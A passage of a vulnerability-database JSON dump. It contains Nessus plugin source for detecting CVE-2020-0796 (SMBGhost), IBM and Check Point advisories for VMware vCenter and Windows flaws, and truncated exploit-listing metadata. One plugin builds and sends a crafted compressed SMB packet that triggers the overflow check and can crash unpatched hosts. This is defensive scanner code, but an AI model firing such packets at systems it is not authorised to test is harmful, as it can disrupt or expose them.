(SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4551762.NASL", "href": "https://www.tenable.com/plugins/nessus/134428", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134428);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"KB4551762: Windows 10 Version 1903 and Windows 10 Version 1909 OOB Security Update (ADV200005)(CVE-2020-0796)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution\nvulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1\n(SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\");\n # https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ab6efe1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4551762');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:35", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote that this plugin works only if it can to connect to the IPC$ share anonymously using SMB dialect 3.1.1.", "cvss3": {}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MICROSOFT_SMB_CVE-2020-0796.NASL", "href": "https://www.tenable.com/plugins/nessus/135177", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135177);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"MSKB\", value:\"4551762\");\n script_xref(name:\"MSFT\", value:\"MS20-4551762\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote that this plugin works only if it can to connect to the IPC$\nshare anonymously using SMB dialect 3.1.1.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32926bb8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4551762.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\", \"os_fingerprint.nasl\", \"samba_detect.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1/compression\");\n script_exclude_keys(\"SMB/samba\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('agent.inc');\n\n##\n# Receive an SMB message starting with the header.\n#\n# @return SMB response message or NULL on error.\n##\nfunction my_smb2_recv()\n{\n local_var socket, timeout, length, trailer, ret, header;\n\n socket = session_get_socket ();\n timeout = session_get_timeout ();\n\n length = recv(socket:socket, length:4, min:4, timeout:timeout);\n if (strlen(length) != 4)\n return NULL;\n\n length = 65535 * ord(length[1]) +\n 256 * ord(length[2]) +\n ord(length[3]);\n\n if (length > 100000)\n length = 100000;\n\n trailer = recv(socket:socket, length:length, min:length, timeout:timeout);\n if (strlen(trailer) < length )\n return NULL;\n\n return trailer;\n}\n\n\n#\n# MAIN\n#\n\n# Exit if run on agent.\nif(agent()) exit(0,'This plugin is disabled on Nessus Agents.');\n\n# Exit if samba is detected.\nif (get_kb_item('SMB/samba') ) exit(0, 'SMB server is Samba.');\n\n# If OS is detected, exit if the OS is not Windows.\nos = get_kb_item('Host/OS');\nif (os && os !~ '[Ww]indows')\n audit(AUDIT_OS_NOT, 'Windows');\n\n# Exit if SMB v3.1.1 is not supported\nif(! get_kb_item('SMB/smb_dialect/3.1.1'))\n exit(0, 'SMB dialect 3.1.1 is not supported on the remote host.');\n\n# Exit if compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n exit(0, 'SMB compression is not supported or enabled on the remote host.'); \n\n# Exit if LZNT1 compression is not supported or enabled.\nif(! get_kb_item('SMB/smb_dialect/3.1.1/compression/LZNT1'))\n exit(0, 'SMB compression algorithm LZNT1 is not supported or enabled on the remote host.');\n\nport = kb_smb_transport();\n\n# SMB transport port isn't open\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port);\n\nif (!smb_session_init(timeout:10)) audit(AUDIT_FN_FAIL, 'smb_session_init');\nsoc = session_get_socket();\n\nret = NetUseAdd(share:'IPC$');\nif(ret != 1)\n exit(0, 'Failed to connect to IPC$ anonymously using SMB v3.1.1.');\n\nLZNT1 = 1;\n# 0x800135 'A's compressed with LZNT1\norig_size = 0x800135;\n\ncompressed = NULL;\n# 0x800000 'A's\nfor (i = 0; i < 0x800; i++)\n compressed += '\\x03\\xb0\\x02\\x41\\xfc\\x0f'; # 0x1000 'A's\n\n# 0x135 'A's\ncompressed += '\\x03\\xb0\\x02\\x41\\x31\\x01';\n\n# Use TREE_CONNECT as the first message in a compound request to\n# avoid crash in srv2.sys versions prior to 10.0.18362.329.\npath = 'IPC$';\ncpath = cstring (string:\"\\\\\", _null:1) + cstring (string:session_get_hostname(), _null:1) + cstring (string:\"\\\", _null:1) + cstring (string:path, _null:1);\n\ndata = raw_word(w:9) + # StructureSize\n raw_word(w:0) + # Reserved\n raw_word(w:0x48) + # PathOffset\n raw_word(w:strlen(cpath)) + # PathLength\n cpath; # Buffer\n\n# Messages in a compound request are 8-byte aligned. \nif(strlen(data) % 8)\n data += crap(data:'\\x00', length: 8 - strlen(data)%8);\n\nmsg1 = smb2_header(command:3, status:STATUS_SUCCESS);\nmsg1 += null_signature;\nmsg1[20] = raw_string(0x40 + strlen(data));\nmsg1 += data;\n\n# The second message in the compound request is compressed such that\n#\n# (COMPRESSION_TRANSFORM_HEADER.offset +\n# COMPRESSION_TRANSFORM_HEADER.OriginalCompressedSegmentSize) > 0x800134\n#\n# Use QUERY_DIRECTORY so that the message is not subject to the 0x11000-byte\n# max msg_size limit.\ncommand = 0xE;\nheader = smb2_header(command:command, status:STATUS_SUCCESS);\nheader += null_signature;\n\nuncompressed = msg1 + header;\ncth = raw_dword(d:0x424D53FC)\n + raw_dword(d:orig_size) # OriginalCompressedSegmentSize\n + raw_word(w:LZNT1) # CompressionAlgorithm\n + raw_word(w:0) # flags\n + raw_dword(d:strlen(uncompressed)); # offset\n\npacket = cth + uncompressed + compressed;\n\nlength = strlen(packet);\nnetbios = netbios_header (type:0, length:length) + packet;\nsend (socket:soc, data:netbios);\nres = my_smb2_recv();\nNetUseDel();\n\n# The vulnerable server does not check\n# offset + OriginalCompressedSegmentSize <= 0x800134, the compound request\n# is processed and a compressed response is returned.\nif((strlen(res) > 16 && get_dword(blob:res, pos:0) == 0x424D53FC)\n # Should not happen; but in case TREE_CONNECT in the compound request\n # fails, crash on vulnerable srv2.sys version < 10.0.18362.329\n || !smb_session_init(timeout:10))\n{\n extra = 'Nessus was able to detect the vulnerability by sending a specially crafted message to the remote SMB server.';\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\n# The patched server checks\n# offset + OriginalCompressedSegmentSize <= 0x800134, and the check fails.\n# The server closes the connection without returning a response.\nelse\n audit(AUDIT_HOST_NOT, 'affected');\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:13", "description": "This plugin has been deprecated due to an out-of-band patch being release by the vendor. The suggested mitigation provided in ADV200005 is no longer required. Plugin 134428 should be used instead to verify the patch is properly applied.", "cvss3": {}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "href": "https://www.tenable.com/plugins/nessus/134420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/03/12. Deprecated by smb_nt_ms20_mar_4551762.nasl.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2020-0796\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Deprecated)\");\n script_summary(english:\"Checks the Windows version and mitigative measures.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin has been deprecated due to an out-of-band patch being release by\nthe vendor. The suggested mitigation provided in ADV200005 is no longer\nrequired. Plugin 134428 should be used instead to verify the patch is properly\napplied.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/WindowsVersionBuild\");\n\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0,'This plugin has been deprecated. Use smb_nt_ms20_mar_4551762.nasl (plugin ID 134428) instead.');\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-05-27T17:56:43", "description": "## Summary\n\nMultiple vulnerabilities have been identified in VMware, a supporting product shipped with IBM Cloud Pak System. Vulnerabilities in VMware vSphere Client (HTML5) for VMware vCenter plugins in vRealize Operations Environment, not used in Cloud Pak Systems, but for VMware vulnerabile vCenter endpoints exist. The recommendation is to apply workaround. Refer to the corresponding sections below for details.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-21972](<https://vulners.com/cve/CVE-2021-21972>) \n**DESCRIPTION: **VMware vCenter Server could allow a remote attacker to execute arbitrary code on the system, caused by an error in the vSphere Client (HTML5). By sending a specially crafted request to port 443, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197192](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197192>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-21973](<https://vulners.com/cve/CVE-2021-21973>) \n**DESCRIPTION: **VMware vCenter Server is vulnerable to server-side request forgery, caused by improper validation of URLs in the vSphere Client (HTML5). By sending a specially-crafted POST request, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197197](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197197>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Cloud Pak System | 2.3.x.x \n \n## Remediation/Fixes\n\nFor unsupported version/release/platform, IBM recommends upgrading to fixed supported version of the of the product. Contact IBM CPS SWAT team for assistance.\n\nVulnerabilities remote code execution vulnerability (CVE-2021-21972) and server side request forgery (SSRF) (CVE-2021-21973) identified in VMware vSphere Client (HTML5) for VMware vCenter plugins in vRealize Operations Environment. These are not enabled by Cloud Pak Systems, but in VMware vCenter endpoints exist.\n\nRefer to the following Workaround and Mitigations section for more information.\n\n## Workarounds and Mitigations\n\nThe workaround and mitigations are for the IBM Cloud Pak System v2.3.3.0, v2.3.3.3, v2.3.3.3 Interim Fix 1.\n\nVulnerabilities in VMware vSphere Client (HTML5) for VMware vCenter plugins in vRealize Operations Environment is not used in IBM Cloud Pak System, but for VMware vulnerable vCenter the endpoints exist. Until fix is available and can be deployed, the solution is to disable the vROps plugins and set them as 'incompatible'. This is a temporary solution that removes the possibility of exploitation. \n\nThe recommendation is to disable the plugins endpoint. Consult <https://kb.vmware.com/s/article/82374> for details. Contact IBM CPS Support (L2/L3) team for assistance.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T12:18:32", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in VMware affect IBM Cloud Pak System", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2021-10-05T12:18:32", "id": "425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D", "href": "https://www.ibm.com/support/pages/node/6485985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-24T06:13:17", "description": "A remote code execution vulnerability exists in VMware vSphere Client. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-28T00:00:00", "type": "checkpoint_advisories", "title": "VMware vSphere Client Remote Code Execution (CVE-2021-21972; CVE-2021-21973)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-11-23T00:00:00", "id": "CPAI-2021-0106", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:38:45", "description": "A buffer overflow vulnerability exists in Microsoft Windows DNS Server. Successful exploitation of this vulnerability could lead to execution of arbitrary code on the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows DNS Server Remote Code Execution (CVE-2020-1350)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T00:00:00", "id": "CPAI-2020-0658", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:39:08", "description": "A vulnerability exists in Windows. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMBv3 Remote Code Execution (CVE-2020-0796)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-30T00:00:00", "id": "CPAI-2020-0136", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T10:05:38", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-34473; CVE-2021-34523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-09-30T00:00:00", "id": "CPAI-2021-0476", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-07T20:28:25", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:35:06", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 